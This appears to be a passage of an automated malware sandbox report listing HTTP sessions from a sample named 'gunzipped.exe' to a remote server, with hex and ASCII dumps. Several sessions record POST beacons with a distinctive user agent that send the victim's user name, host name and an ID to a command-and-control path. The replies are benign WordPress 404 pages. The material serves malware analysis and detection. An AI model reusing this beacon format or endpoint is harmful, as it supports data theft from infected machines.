68 70 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 57 6f 6f 64 20 77 6f 72 6c 64 20 26 72 61 71 75 6f 3b 20 43 6f 6d 6d 65 6e 74 73 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 2f 69 6e 64 65 78 2e 70 68 70 2f 63 6f 6d 6d 65 6e 74 73 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 37 32 78 37 32 5c 2f 22 2c 22 65 78 74 22 3a 22 2e 70 6e 67 22 2c 22 73 76 67 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 73 76 67 5c 2f 22 2c 22 73 76 67 45 78 74 22 3a 22 2e 73 76 67 22 2c 22 73 6f 75 72 63 65 22 3a 7b 22 63 6f 6e 63 61 74 65 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 32 22 7d 7d 3b 0a 2f 2a 21 20 54 68 69 73 20 66 69 6c 65 20 69 73 20 61 75 74 6f 2d 67 65 6e 65 72 61 74 65 64 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 69 2c 6e Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width"><link rel="profile" href="http://gmpg.org/xfn/11"><title>Page not found – Wood world</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="Wood world » Feed" href="http://136.244.109.75/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="Wood world » Comments Feed" href="http://136.244.109.75/index.php/comments/feed/" /><script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/136.244.109.75\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.2"}};/! This file is auto-generated /!function(i,n
Apr 17, 2024 03:17:25.303467035 CEST	1289	IN	Data Raw: 29 7b 76 61 72 20 6f 2c 73 2c 65 3b 66 75 6e 63 74 69 6f 6e 20 63 28 65 29 7b 74 72 79 7b 76 61 72 20 74 3d 7b 73 75 70 70 6f 72 74 54 65 73 74 73 3a 65 2c 74 69 6d 65 73 74 61 6d 70 3a 28 6e 65 77 20 44 61 74 65 29 2e 76 61 6c 75 65 4f 66 28 29 Data Ascii: ){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,JSON.stringify(t))}catch(e){}}function p(e,t,n){e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(t,0,0);var t=new Uint32Arra
Apr 17, 2024 03:17:25.303505898 CEST	1289	IN	Data Raw: 7d 66 75 6e 63 74 69 6f 6e 20 74 28 65 29 7b 76 61 72 20 74 3d 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b 74 2e 73 72 63 3d 65 2c 74 2e 64 65 66 65 72 3d 21 30 2c 69 2e 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69 Data Ascii: }function t(e){var t=i.createElement("script");t.src=e,t.defer=!0,i.head.appendChild(t)}"undefined"!=typeof Promise&&(o="wpEmojiSettingsSupports",s=["flag","emoji"],n.supports={everything:!0,everythingExceptFlag:!0},e=new Promise(function(e){i
Apr 17, 2024 03:17:25.303550005 CEST	1289	IN	Data Raw: 6f 72 74 73 2e 66 6c 61 67 2c 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 31 2c 6e 2e 72 65 61 64 79 43 61 6c 6c 62 61 63 6b 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 30 7d 7d 29 2e 74 68 65 6e 28 66 75 6e 63 74 69 6f 6e 28 Data Ascii: orts.flag,n.DOMReady=!1,n.readyCallback=function(){n.DOMReady=!0}}).then(function(){return e}).then(function(){var e;n.supports.everything\|\|(n.readyCallback(),(e=n.source\|\|{}).concatemoji?t(e.concatemoji):e.wpemoji&&e.twemoji&&(t(e.twemoji),t(
Apr 17, 2024 03:17:25.303592920 CEST	1289	IN	Data Raw: 31 65 6d 7d 2e 62 6c 6f 63 6b 73 2d 67 61 6c 6c 65 72 79 2d 63 61 70 74 69 6f 6e 7b 63 6f 6c 6f 72 3a 23 35 35 35 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 69 73 2d 64 61 72 6b 2d 74 Data Ascii: 1em}.blocks-gallery-caption{color:#555;font-size:13px;text-align:center}.is-dark-theme .blocks-gallery-caption{color:#ffffffa6}.wp-block-image figcaption{color:#555;font-size:13px;text-align:center}.is-dark-theme .wp-block-image figcaption{col
Apr 17, 2024 03:17:25.303631067 CEST	1289	IN	Data Raw: 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 32 70 78 20 73 6f 6c 69 64 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 61 75 74 6f 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 61 75 74 6f 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 73 65 70 61 72 61 74 6f 72 2e 68 61 73 Data Ascii: border-bottom:2px solid;margin-left:auto;margin-right:auto}.wp-block-separator.has-alpha-channel-opacity{opacity:1}.wp-block-separator:not(.is-style-wide):not(.is-style-dots){width:100px}.wp-block-separator.has-background:not(.is-style-dots){b
Apr 17, 2024 03:17:25.303669930 CEST	1289	IN	Data Raw: 69 73 68 2d 67 72 61 79 3a 20 23 61 62 62 38 63 33 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 77 68 69 74 65 3a 20 23 66 66 66 66 66 66 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 70 69 Data Ascii: ish-gray: #abb8c3;--wp--preset--color--white: #ffffff;--wp--preset--color--pale-pink: #f78da7;--wp--preset--color--vivid-red: #cf2e2e;--wp--preset--color--luminous-vivid-orange: #ff6900;--wp--preset--color--luminous-vivid-amber: #fcb900;--wp--
Apr 17, 2024 03:17:25.303711891 CEST	1289	IN	Data Raw: 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 62 6c 75 73 68 2d 6c 69 67 68 74 2d 70 75 72 70 6c 65 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 35 35 Data Ascii: ) 100%);--wp--preset--gradient--blush-light-purple: linear-gradient(135deg,rgb(255,206,236) 0%,rgb(152,150,240) 100%);--wp--preset--gradient--blush-bordeaux: linear-gradient(135deg,rgb(254,205,165) 0%,rgb(254,45,45) 50%,rgb(107,0,62) 100%);--w
Apr 17, 2024 03:17:25.303750992 CEST	1289	IN	Data Raw: 6e 65 64 3a 20 36 70 78 20 36 70 78 20 30 70 78 20 2d 33 70 78 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 31 29 2c 20 36 70 78 20 36 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 31 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 Data Ascii: ned: 6px 6px 0px -3px rgba(255, 255, 255, 1), 6px 6px rgba(0, 0, 0, 1);--wp--preset--shadow--crisp: 6px 6px 0px rgba(0, 0, 0, 1);}:where(.is-layout-flex){gap: 0.5em;}:where(.is-layout-grid){gap: 0.5em;}body .is-layout-flow > .alignleft{float:
Apr 17, 2024 03:17:25.303792953 CEST	1289	IN	Data Raw: 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 66 6c 65 78 29 7b 67 61 70 3a 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 67 72 69 64 29 Data Ascii: p-block-columns.is-layout-flex){gap: 2em;}:where(.wp-block-columns.is-layout-grid){gap: 2em;}:where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:where(.wp-block-post-template.is-layout-grid){gap: 1.25em;}.has-black-color{color: var(--

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.5	49734	136.244.109.75	80	4080	C:\Users\user\Desktop\gunzipped.exe

Timestamp	Bytes transferred	Direction	Data
Apr 17, 2024 03:17:25.655731916 CEST	244	OUT	POST /index.php/1748937 HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 136.244.109.75 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 412D3974 Content-Length: 153 Connection: close
Apr 17, 2024 03:17:25.864007950 CEST	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 33 00 36 00 39 00 30 00 35 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons936905ALFONS-PC0FDD42EE188E931437F4FBE2C
Apr 17, 2024 03:17:26.812987089 CEST	1289	IN	HTTP/1.0 404 Not Found Date: Wed, 17 Apr 2024 01:17:25 GMT Server: Apache/2.4.52 (Ubuntu) Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <http://136.244.109.75/index.php/wp-json/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 57 6f 6f 64 20 77 6f 72 6c 64 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 57 6f 6f 64 20 77 6f 72 6c 64 20 26 72 61 71 75 6f 3b 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 2f 69 6e 64 65 78 2e 70 68 70 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 57 6f 6f 64 20 77 6f 72 6c 64 20 26 72 61 71 75 6f 3b 20 43 6f 6d 6d 65 6e 74 73 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 2f 69 6e 64 65 78 2e 70 68 70 2f 63 6f 6d 6d 65 6e 74 73 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 37 32 78 37 32 5c 2f 22 2c 22 65 78 74 22 3a 22 2e 70 6e 67 22 2c 22 73 76 67 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 73 76 67 5c 2f 22 2c 22 73 76 67 45 78 74 22 3a 22 2e 73 76 67 22 2c 22 73 6f 75 72 63 65 22 3a 7b 22 63 6f 6e 63 61 74 65 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 32 22 7d 7d 3b 0a 2f 2a 21 20 54 68 69 73 20 66 69 6c 65 20 69 73 20 61 75 74 6f 2d 67 65 6e 65 72 61 74 65 64 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 69 2c 6e Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width"><link rel="profile" href="http://gmpg.org/xfn/11"><title>Page not found – Wood world</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="Wood world » Feed" href="http://136.244.109.75/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="Wood world » Comments Feed" href="http://136.244.109.75/index.php/comments/feed/" /><script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/136.244.109.75\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.2"}};/! This file is auto-generated /!function(i,n
Apr 17, 2024 03:17:26.813050985 CEST	1289	IN	Data Raw: 29 7b 76 61 72 20 6f 2c 73 2c 65 3b 66 75 6e 63 74 69 6f 6e 20 63 28 65 29 7b 74 72 79 7b 76 61 72 20 74 3d 7b 73 75 70 70 6f 72 74 54 65 73 74 73 3a 65 2c 74 69 6d 65 73 74 61 6d 70 3a 28 6e 65 77 20 44 61 74 65 29 2e 76 61 6c 75 65 4f 66 28 29 Data Ascii: ){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,JSON.stringify(t))}catch(e){}}function p(e,t,n){e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(t,0,0);var t=new Uint32Arra
Apr 17, 2024 03:17:26.813088894 CEST	1289	IN	Data Raw: 7d 66 75 6e 63 74 69 6f 6e 20 74 28 65 29 7b 76 61 72 20 74 3d 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b 74 2e 73 72 63 3d 65 2c 74 2e 64 65 66 65 72 3d 21 30 2c 69 2e 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69 Data Ascii: }function t(e){var t=i.createElement("script");t.src=e,t.defer=!0,i.head.appendChild(t)}"undefined"!=typeof Promise&&(o="wpEmojiSettingsSupports",s=["flag","emoji"],n.supports={everything:!0,everythingExceptFlag:!0},e=new Promise(function(e){i
Apr 17, 2024 03:17:26.813127995 CEST	1289	IN	Data Raw: 6f 72 74 73 2e 66 6c 61 67 2c 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 31 2c 6e 2e 72 65 61 64 79 43 61 6c 6c 62 61 63 6b 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 30 7d 7d 29 2e 74 68 65 6e 28 66 75 6e 63 74 69 6f 6e 28 Data Ascii: orts.flag,n.DOMReady=!1,n.readyCallback=function(){n.DOMReady=!0}}).then(function(){return e}).then(function(){var e;n.supports.everything\|\|(n.readyCallback(),(e=n.source\|\|{}).concatemoji?t(e.concatemoji):e.wpemoji&&e.twemoji&&(t(e.twemoji),t(
Apr 17, 2024 03:17:26.813167095 CEST	1289	IN	Data Raw: 31 65 6d 7d 2e 62 6c 6f 63 6b 73 2d 67 61 6c 6c 65 72 79 2d 63 61 70 74 69 6f 6e 7b 63 6f 6c 6f 72 3a 23 35 35 35 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 69 73 2d 64 61 72 6b 2d 74 Data Ascii: 1em}.blocks-gallery-caption{color:#555;font-size:13px;text-align:center}.is-dark-theme .blocks-gallery-caption{color:#ffffffa6}.wp-block-image figcaption{color:#555;font-size:13px;text-align:center}.is-dark-theme .wp-block-image figcaption{col
Apr 17, 2024 03:17:26.813206911 CEST	1289	IN	Data Raw: 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 32 70 78 20 73 6f 6c 69 64 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 61 75 74 6f 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 61 75 74 6f 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 73 65 70 61 72 61 74 6f 72 2e 68 61 73 Data Ascii: border-bottom:2px solid;margin-left:auto;margin-right:auto}.wp-block-separator.has-alpha-channel-opacity{opacity:1}.wp-block-separator:not(.is-style-wide):not(.is-style-dots){width:100px}.wp-block-separator.has-background:not(.is-style-dots){b
Apr 17, 2024 03:17:26.813245058 CEST	1289	IN	Data Raw: 69 73 68 2d 67 72 61 79 3a 20 23 61 62 62 38 63 33 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 77 68 69 74 65 3a 20 23 66 66 66 66 66 66 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 70 69 Data Ascii: ish-gray: #abb8c3;--wp--preset--color--white: #ffffff;--wp--preset--color--pale-pink: #f78da7;--wp--preset--color--vivid-red: #cf2e2e;--wp--preset--color--luminous-vivid-orange: #ff6900;--wp--preset--color--luminous-vivid-amber: #fcb900;--wp--
Apr 17, 2024 03:17:26.813288927 CEST	1289	IN	Data Raw: 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 62 6c 75 73 68 2d 6c 69 67 68 74 2d 70 75 72 70 6c 65 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 35 35 Data Ascii: ) 100%);--wp--preset--gradient--blush-light-purple: linear-gradient(135deg,rgb(255,206,236) 0%,rgb(152,150,240) 100%);--wp--preset--gradient--blush-bordeaux: linear-gradient(135deg,rgb(254,205,165) 0%,rgb(254,45,45) 50%,rgb(107,0,62) 100%);--w
Apr 17, 2024 03:17:26.813327074 CEST	1289	IN	Data Raw: 6e 65 64 3a 20 36 70 78 20 36 70 78 20 30 70 78 20 2d 33 70 78 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 31 29 2c 20 36 70 78 20 36 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 31 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 Data Ascii: ned: 6px 6px 0px -3px rgba(255, 255, 255, 1), 6px 6px rgba(0, 0, 0, 1);--wp--preset--shadow--crisp: 6px 6px 0px rgba(0, 0, 0, 1);}:where(.is-layout-flex){gap: 0.5em;}:where(.is-layout-grid){gap: 0.5em;}body .is-layout-flow > .alignleft{float:
Apr 17, 2024 03:17:26.813365936 CEST	1289	IN	Data Raw: 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 66 6c 65 78 29 7b 67 61 70 3a 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 67 72 69 64 29 Data Ascii: p-block-columns.is-layout-flex){gap: 2em;}:where(.wp-block-columns.is-layout-grid){gap: 2em;}:where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:where(.wp-block-post-template.is-layout-grid){gap: 1.25em;}.has-black-color{color: var(--

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.5	49735	136.244.109.75	80	4080	C:\Users\user\Desktop\gunzipped.exe

Timestamp	Bytes transferred	Direction	Data
Apr 17, 2024 03:17:27.158634901 CEST	244	OUT	POST /index.php/1748937 HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 136.244.109.75 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 412D3974 Content-Length: 153 Connection: close
Apr 17, 2024 03:17:27.362607956 CEST	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 33 00 36 00 39 00 30 00 35 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons936905ALFONS-PC0FDD42EE188E931437F4FBE2C
Apr 17, 2024 03:17:28.322999954 CEST	1289	IN	HTTP/1.0 404 Not Found Date: Wed, 17 Apr 2024 01:17:27 GMT Server: Apache/2.4.52 (Ubuntu) Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <http://136.244.109.75/index.php/wp-json/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 57 6f 6f 64 20 77 6f 72 6c 64 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 57 6f 6f 64 20 77 6f 72 6c 64 20 26 72 61 71 75 6f 3b 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 2f 69 6e 64 65 78 2e 70 68 70 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 57 6f 6f 64 20 77 6f 72 6c 64 20 26 72 61 71 75 6f 3b 20 43 6f 6d 6d 65 6e 74 73 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 2f 69 6e 64 65 78 2e 70 68 70 2f 63 6f 6d 6d 65 6e 74 73 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 37 32 78 37 32 5c 2f 22 2c 22 65 78 74 22 3a 22 2e 70 6e 67 22 2c 22 73 76 67 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 73 76 67 5c 2f 22 2c 22 73 76 67 45 78 74 22 3a 22 2e 73 76 67 22 2c 22 73 6f 75 72 63 65 22 3a 7b 22 63 6f 6e 63 61 74 65 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 32 22 7d 7d 3b 0a 2f 2a 21 20 54 68 69 73 20 66 69 6c 65 20 69 73 20 61 75 74 6f 2d 67 65 6e 65 72 61 74 65 64 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 69 2c 6e Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width"><link rel="profile" href="http://gmpg.org/xfn/11"><title>Page not found – Wood world</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="Wood world » Feed" href="http://136.244.109.75/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="Wood world » Comments Feed" href="http://136.244.109.75/index.php/comments/feed/" /><script>window._wpemojiSettings = 